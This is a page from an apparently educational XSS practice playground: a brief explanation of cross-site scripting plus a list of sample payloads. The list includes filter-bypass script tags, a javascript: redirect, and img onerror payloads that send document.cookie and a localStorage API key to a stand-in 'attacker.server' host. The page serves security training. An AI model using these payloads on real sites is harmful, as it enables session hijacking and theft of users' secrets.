XSS Attacks Playground

Security: Low

For security reasons, some features require you to log in. Please login to gain full access to all features.

Cross-Site Scripting (XSS) is a type of web security vulnerability and attack that occurs when malicious code is injected into a website and then executed in a user's web browser. The attack takes advantage of the trust a user places in a particular website and exploits the website's failure to properly validate, filter, or sanitize user-provided data before displaying it to other users.

It stores max 2 comments. All comments automatically reset 5 minutes after the posting of the most recent comment.

Resources

<script>alert('XSS')</script>

Hello"><script>alert('XSS')</script>

<scRipT>alert('XSS')</scRipT>

https://target.com/?redir=javascript:alert('XSS')

<img src=x onerror="this.src='https://attacker.server?'+document.cookie; this.removeAttribute('onerror');">

<img src=x onerror="this.src='https://attacker.server?'+document.domain; this.removeAttribute('onerror');">

<img src=x onerror="this.src='https://attacker.server?'+localStorage.getItem('apiKey'); this.removeAttribute('onerror');">

How to Use

Note: We plan to create videos in English after completing the project.

XSS Attacks Playground

Do you like XSS attacks?

Resources

Sample Payloads

Useful Links

Prevention

How to Use

Videos in Bengali